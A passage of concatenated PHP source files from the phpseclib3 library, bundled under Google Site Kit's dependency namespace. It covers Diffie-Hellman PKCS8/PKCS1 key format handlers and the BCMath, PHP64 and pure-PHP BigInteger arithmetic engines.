Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted DH Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS8 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS8 { /** * OID Name * * @var string */ const OID_NAME = 'dhKeyAgreement'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.113549.1.3.1'; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = \false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'privateKey' : 'publicKey'; $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key[$type . 'Algorithm']['parameters']->element); if (empty($decoded)) { throw new \RuntimeException('Unable to decode BER of parameters'); } $components = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DHParameter::MAP); if (!\is_array($components)) { throw new \RuntimeException('Unable to perform ASN1 mapping on parameters'); } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key[$type]); switch (\true) { case !isset($decoded): case !isset($decoded[0]['content']): case !$decoded[0]['content'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: throw new \RuntimeException('Unable to decode BER of parameters'); } $components[$type] = $decoded[0]['content']; return $components; } /** * Convert a private key to the appropriate format. * * @param BigInteger $prime * @param BigInteger $base * @param BigInteger $privateKey * @param BigInteger $publicKey * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $prime, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $base, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $publicKey, $password = '', array $options = []) { $params = ['prime' => $prime, 'base' => $base]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DHParameter::MAP); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($privateKey, ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]); return self::wrapPrivateKey($key, [], $params, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $prime * @param BigInteger $base * @param BigInteger $publicKey * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $prime, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $base, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $publicKey, array $options = []) { $params = ['prime' => $prime, 'base' => $base]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DHParameter::MAP); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params); $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($publicKey, ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]); return self::wrapPublicKey($key, $params, null, $options); } } <?php /** * "PKCS1" Formatted EC Key Handler * * PHP version 5 * * Processes keys with the following headers: * * -----BEGIN DH PARAMETERS----- * * Technically, PKCS1 is for RSA keys, only, but we're using PKCS1 to describe * DSA, whose format isn't really formally described anywhere, so might as well * use it to describe this, too. * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * "PKCS1" Formatted DH Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $components = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DHParameter::MAP); if (!\is_array($components)) { throw new \RuntimeException('Unable to perform ASN1 mapping on parameters'); } return $components; } /** * Convert EC parameters to the appropriate format * * @return string */ public static function saveParameters(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $prime, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $base, array $options = []) { $params = ['prime' => $prime, 'base' => $base]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DHParameter::MAP); return "-----BEGIN DH PARAMETERS-----\r\n" . \chunk_split(\base64_encode($params), 64) . "-----END DH PARAMETERS-----\r\n"; } } <?php /** * BCMath BigInteger Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; /** * BCMath Engine. * * @author Jim Wigginton <terrafrost@php.net> */ class BCMath extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine { /** * Can Bitwise operations be done fast? * * @see parent::bitwise_leftRotate() * @see parent::bitwise_rightRotate() */ const FAST_BITWISE = \false; /** * Engine Directory * * @see parent::setModExpEngine */ const ENGINE_DIR = 'BCMath'; /** * Test for engine validity * * @return bool * @see parent::__construct() */ public static function isValidEngine() { return \extension_loaded('bcmath'); } /** * Default constructor * * @param mixed $x integer Base-10 number or base-$base number if $base set. * @param int $base * @see parent::__construct() */ public function __construct($x = 0, $base = 10) { if (!isset(static::$isValidEngine[static::class])) { static::$isValidEngine[static::class] = self::isValidEngine(); } if (!static::$isValidEngine[static::class]) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException('BCMath is not setup correctly on this system'); } $this->value = '0'; parent::__construct($x, $base); } /** * Initialize a BCMath BigInteger Engine instance * * @param int $base * @see parent::__construct() */ protected function initialize($base) { switch (\abs($base)) { case 256: // round $len to the nearest 4 $len = \strlen($this->value) + 3 & ~3; $x = \str_pad($this->value, $len, \chr(0), \STR_PAD_LEFT); $this->value = '0'; for ($i = 0; $i < $len; $i += 4) { $this->value = \bcmul($this->value, '4294967296', 0); // 4294967296 == 2**32 $this->value = \bcadd($this->value, 0x1000000 * \ord($x[$i]) + (\ord($x[$i + 1]) << 16 | \ord($x[$i + 2]) << 8 | \ord($x[$i + 3])), 0); } if ($this->is_negative) { $this->value = '-' . $this->value; } break; case 16: $x = \strlen($this->value) & 1 ? '0' . $this->value : $this->value; $temp = new self(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin($x), 256); $this->value = $this->is_negative ? '-' . $temp->value : $temp->value; $this->is_negative = \false; break; case 10: // explicitly casting $x to a string is necessary, here, since doing $x[0] on -1 yields different // results then doing it on '-1' does (modInverse does $x[0]) $this->value = $this->value === '-' ? '0' : (string) $this->value; } } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { if ($this->value === '0') { return '0'; } return \ltrim($this->value, '0'); } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = \false) { if ($twos_compliment) { return $this->toBytesHelper(); } $value = ''; $current = $this->value; if ($current[0] == '-') { $current = \substr($current, 1); } while (\bccomp($current, '0', 0) > 0) { $temp = \bcmod($current, '16777216'); $value = \chr($temp >> 16) . \chr($temp >> 8) . \chr($temp) . $value; $current = \bcdiv($current, '16777216', 0); } return $this->precision > 0 ? \substr(\str_pad($value, $this->precision >> 3, \chr(0), \STR_PAD_LEFT), -($this->precision >> 3)) : \ltrim($value, \chr(0)); } /** * Adds two BigIntegers. * * @param BCMath $y * @return BCMath */ public function add(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $y) { $temp = new self(); $temp->value = \bcadd($this->value, $y->value); return $this->normalize($temp); } /** * Subtracts two BigIntegers. * * @param BCMath $y * @return BCMath */ public function subtract(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $y) { $temp = new self(); $temp->value = \bcsub($this->value, $y->value); return $this->normalize($temp); } /** * Multiplies two BigIntegers. * * @param BCMath $x * @return BCMath */ public function multiply(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x) { $temp = new self(); $temp->value = \bcmul($this->value, $x->value); return $this->normalize($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param BCMath $y * @return array{static, static} */ public function divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $y) { $quotient = new self(); $remainder = new self(); $quotient->value = \bcdiv($this->value, $y->value, 0); $remainder->value = \bcmod($this->value, $y->value); if ($remainder->value[0] == '-') { $remainder->value = \bcadd($remainder->value, $y->value[0] == '-' ? \substr($y->value, 1) : $y->value, 0); } return [$this->normalize($quotient), $this->normalize($remainder)]; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param BCMath $n * @return false|BCMath */ public function modInverse(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { return $this->modInverseHelper($n); } /** * Calculates the greatest common divisor and Bezout's identity. * * Say you have 693 and 609. The GCD is 21. Bezout's identity states that there exist integers x and y such that * 693*x + 609*y == 21. In point of fact, there are actually an infinite number of x and y combinations and which * combination is returned is dependent upon which mode is in use. See * {@link http://en.wikipedia.org/wiki/B%C3%A9zout%27s_identity Bezout's identity - Wikipedia} for more information. * * @param BCMath $n * @return array{gcd: static, x: static, y: static} */ public function extendedGCD(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { // it might be faster to use the binary xGCD algorithim here, as well, but (1) that algorithim works // best when the base is a power of 2 and (2) i don't think it'd make much difference, anyway. as is, // the basic extended euclidean algorithim is what we're using. $u = $this->value; $v = $n->value; $a = '1'; $b = '0'; $c = '0'; $d = '1'; while (\bccomp($v, '0', 0) != 0) { $q = \bcdiv($u, $v, 0); $temp = $u; $u = $v; $v = \bcsub($temp, \bcmul($v, $q, 0), 0); $temp = $a; $a = $c; $c = \bcsub($temp, \bcmul($a, $q, 0), 0); $temp = $b; $b = $d; $d = \bcsub($temp, \bcmul($b, $q, 0), 0); } return ['gcd' => $this->normalize(new static($u)), 'x' => $this->normalize(new static($a)), 'y' => $this->normalize(new static($b))]; } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param BCMath $n * @return BCMath */ public function gcd(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { \extract($this->extendedGCD($n)); /** @var BCMath $gcd */ return $gcd; } /** * Absolute value. * * @return BCMath */ public function abs() { $temp = new static(); $temp->value = \strlen($this->value) && $this->value[0] == '-' ? \substr($this->value, 1) : $this->value; return $temp; } /** * Logical And * * @param BCMath $x * @return BCMath */ public function bitwise_and(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x) { return $this->bitwiseAndHelper($x); } /** * Logical Or * * @param BCMath $x * @return BCMath */ public function bitwise_or(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x) { return $this->bitwiseOrHelper($x); } /** * Logical Exclusive Or * * @param BCMath $x * @return BCMath */ public function bitwise_xor(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x) { return $this->bitwiseXorHelper($x); } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return BCMath */ public function bitwise_rightShift($shift) { $temp = new static(); $temp->value = \bcdiv($this->value, \bcpow('2', $shift, 0), 0); return $this->normalize($temp); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return BCMath */ public function bitwise_leftShift($shift) { $temp = new static(); $temp->value = \bcmul($this->value, \bcpow('2', $shift, 0), 0); return $this->normalize($temp); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this * is demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param BCMath $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $y) { return \bccomp($this->value, $y->value, 0); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param BCMath $x * @return bool */ public function equals(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x) { return $this->value == $x->value; } /** * Performs modular exponentiation. * * @param BCMath $e * @param BCMath $n * @return BCMath */ public function modPow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param BCMath $e * @param BCMath $n * @return BCMath */ public function powMod(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * @param BCMath $e * @param BCMath $n * @return BCMath */ protected function powModInner(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { try { $class = static::$modexpEngine[static::class]; return $class::powModHelper($this, $e, $n, static::class); } catch (\Exception $err) { return \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\DefaultEngine::powModHelper($this, $e, $n, static::class); } } /** * Normalize * * Removes leading zeros and truncates (if necessary) to maintain the appropriate precision * * @param BCMath $result * @return BCMath */ protected function normalize(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $result) { $result->precision = $this->precision; $result->bitmask = $this->bitmask; if ($result->bitmask !== \false) { $result->value = \bcmod($result->value, $result->bitmask->value); } return $result; } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param BCMath $min * @param BCMath $max * @return false|BCMath */ public static function randomRangePrime(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param BCMath $min * @param BCMath $max * @return BCMath */ public static function randomRange(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $max) { return self::randomRangeHelper($min, $max); } /** * Make the current number odd * * If the current number is odd it'll be unchanged. If it's even, one will be added to it. * * @see self::randomPrime() */ protected function make_odd() { if (!$this->isOdd()) { $this->value = \bcadd($this->value, '1'); } } /** * Test the number against small primes. * * @see self::isPrime() */ protected function testSmallPrimes() { if ($this->value === '1') { return \false; } if ($this->value === '2') { return \true; } if ($this->value[\strlen($this->value) - 1] % 2 == 0) { return \false; } $value = $this->value; foreach (self::PRIMES as $prime) { $r = \bcmod($this->value, $prime); if ($r == '0') { return $this->value == $prime; } } return \true; } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param BCMath $r * @return int * @see self::isPrime() */ public static function scan1divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $r) { $r_value =& $r->value; $s = 0; // if $n was 1, $r would be 0 and this would be an infinite loop, hence our $this->equals(static::$one[static::class]) check earlier while ($r_value[\strlen($r_value) - 1] % 2 == 0) { $r_value = \bcdiv($r_value, '2', 0); ++$s; } return $s; } /** * Performs exponentiation. * * @param BCMath $n * @return BCMath */ public function pow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { $temp = new self(); $temp->value = \bcpow($this->value, $n->value); return $this->normalize($temp); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param BCMath ...$nums * @return BCMath */ public static function min(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param BCMath ...$nums * @return BCMath */ public static function max(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param BCMath $min * @param BCMath $max * @return bool */ public function between(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } /** * Set Bitmask * * @param int $bits * @return Engine * @see self::setPrecision() */ protected static function setBitmask($bits) { $temp = parent::setBitmask($bits); return $temp->add(static::$one[static::class]); } /** * Is Odd? * * @return bool */ public function isOdd() { return $this->value[\strlen($this->value) - 1] % 2 == 1; } /** * Tests if a bit is set * * @return bool */ public function testBit($x) { return \bccomp(\bcmod($this->value, \bcpow('2', $x + 1, 0)), \bcpow('2', $x, 0), 0) >= 0; } /** * Is Negative? * * @return bool */ public function isNegative() { return \strlen($this->value) && $this->value[0] == '-'; } /** * Negate * * Given $k, returns -$k * * @return BCMath */ public function negate() { $temp = clone $this; if (!\strlen($temp->value)) { return $temp; } $temp->value = $temp->value[0] == '-' ? \substr($this->value, 1) : '-' . $this->value; return $temp; } } <?php /** * Pure-PHP 64-bit BigInteger Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; /** * Pure-PHP 64-bit Engine. * * Uses 64-bit integers if int size is 8 bits * * @author Jim Wigginton <terrafrost@php.net> */ class PHP64 extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP { // Constants used by PHP.php const BASE = 31; const BASE_FULL = 0x80000000; const MAX_DIGIT = 0x7fffffff; const MSB = 0x40000000; /** * MAX10 in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10 = 1000000000; /** * MAX10LEN in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10LEN = 9; const MAX_DIGIT2 = 4611686018427387904; /** * Initialize a PHP64 BigInteger Engine instance * * @param int $base * @see parent::initialize() */ protected function initialize($base) { if ($base != 256 && $base != -256) { return parent::initialize($base); } $val = $this->value; $this->value = []; $vals =& $this->value; $i = \strlen($val); if (!$i) { return; } while (\true) { $i -= 4; if ($i < 0) { if ($i == -4) { break; } $val = \substr($val, 0, 4 + $i); $val = \str_pad($val, 4, "\x00", \STR_PAD_LEFT); if ($val == "\x00\x00\x00\x00") { break; } $i = 0; } list(, $digit) = \unpack('N', \substr($val, $i, 4)); $step = \count($vals) & 7; if (!$step) { $digit &= static::MAX_DIGIT; $i++; } else { $shift = 8 - $step; $digit >>= $shift; $shift = 32 - $shift; $digit &= (1 << $shift) - 1; $temp = $i > 0 ? \ord($val[$i - 1]) : 0; $digit |= $temp << $shift & 0x7f000000; } $vals[] = $digit; } while (\end($vals) === 0) { \array_pop($vals); } \reset($vals); } /** * Test for engine validity * * @see parent::__construct() * @return bool */ public static function isValidEngine() { return \PHP_INT_SIZE >= 8 && !self::testJITOnWindows(); } /** * Adds two BigIntegers. * * @param PHP64 $y * @return PHP64 */ public function add(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $y) { $temp = self::addHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Subtracts two BigIntegers. * * @param PHP64 $y * @return PHP64 */ public function subtract(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $y) { $temp = self::subtractHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Multiplies two BigIntegers. * * @param PHP64 $y * @return PHP64 */ public function multiply(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $y) { $temp = self::multiplyHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param PHP64 $y * @return array{PHP64, PHP64} */ public function divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $y) { return $this->divideHelper($y); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP64 $n * @return false|PHP64 */ public function modInverse(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $n) { return $this->modInverseHelper($n); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP64 $n * @return PHP64[] */ public function extendedGCD(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $n) { return $this->extendedGCDHelper($n); } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param PHP64 $n * @return PHP64 */ public function gcd(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $n) { return $this->extendedGCD($n)['gcd']; } /** * Logical And * * @param PHP64 $x * @return PHP64 */ public function bitwise_and(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $x) { return $this->bitwiseAndHelper($x); } /** * Logical Or * * @param PHP64 $x * @return PHP64 */ public function bitwise_or(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $x) { return $this->bitwiseOrHelper($x); } /** * Logical Exclusive Or * * @param PHP64 $x * @return PHP64 */ public function bitwise_xor(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $x) { return $this->bitwiseXorHelper($x); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this is * demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param PHP64 $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $y) { return parent::compareHelper($this->value, $this->is_negative, $y->value, $y->is_negative); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param PHP64 $x * @return bool */ public function equals(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $x) { return $this->value === $x->value && $this->is_negative == $x->is_negative; } /** * Performs modular exponentiation. * * @param PHP64 $e * @param PHP64 $n * @return PHP64 */ public function modPow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param PHP64 $e * @param PHP64 $n * @return PHP64|false */ public function powMod(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $n) { return $this->powModOuter($e, $n); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param PHP64 $min * @param PHP64 $max * @return false|PHP64 */ public static function randomRangePrime(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param PHP64 $min * @param PHP64 $max * @return PHP64 */ public static function randomRange(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $max) { return self::randomRangeHelper($min, $max); } /** * Performs exponentiation. * * @param PHP64 $n * @return PHP64 */ public function pow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $n) { return $this->powHelper($n); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param PHP64 ...$nums * @return PHP64 */ public static function min(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param PHP64 ...$nums * @return PHP64 */ public static function max(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param PHP64 $min * @param PHP64 $max * @return bool */ public function between(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP64 $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } } <?php /** * Pure-PHP BigInteger Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; /** * Pure-PHP Engine. * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PHP extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine { /**#@+ * Array constants * * Rather than create a thousands and thousands of new BigInteger objects in repeated function calls to add() and * multiply() or whatever, we'll just work directly on arrays, taking them in as parameters and returning them. * */ /** * $result[self::VALUE] contains the value. */ const VALUE = 0; /** * $result[self::SIGN] contains the sign. */ const SIGN = 1; /**#@-*/ /** * Karatsuba Cutoff * * At what point do we switch between Karatsuba multiplication and schoolbook long multiplication? * */ const KARATSUBA_CUTOFF = 25; /** * Can Bitwise operations be done fast? * * @see parent::bitwise_leftRotate() * @see parent::bitwise_rightRotate() */ const FAST_BITWISE = \true; /** * Engine Directory * * @see parent::setModExpEngine */ const ENGINE_DIR = 'PHP'; /** * Default constructor * * @param mixed $x integer Base-10 number or base-$base number if $base set. * @param int $base * @return PHP * @see parent::__construct() */ public function __construct($x = 0, $base = 10) { if (!isset(static::$isValidEngine[static::class])) { static::$isValidEngine[static::class] = static::isValidEngine(); } if (!static::$isValidEngine[static::class]) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException(static::class . ' is not setup correctly on this system'); } $this->value = []; parent::__construct($x, $base); } /** * Initialize a PHP 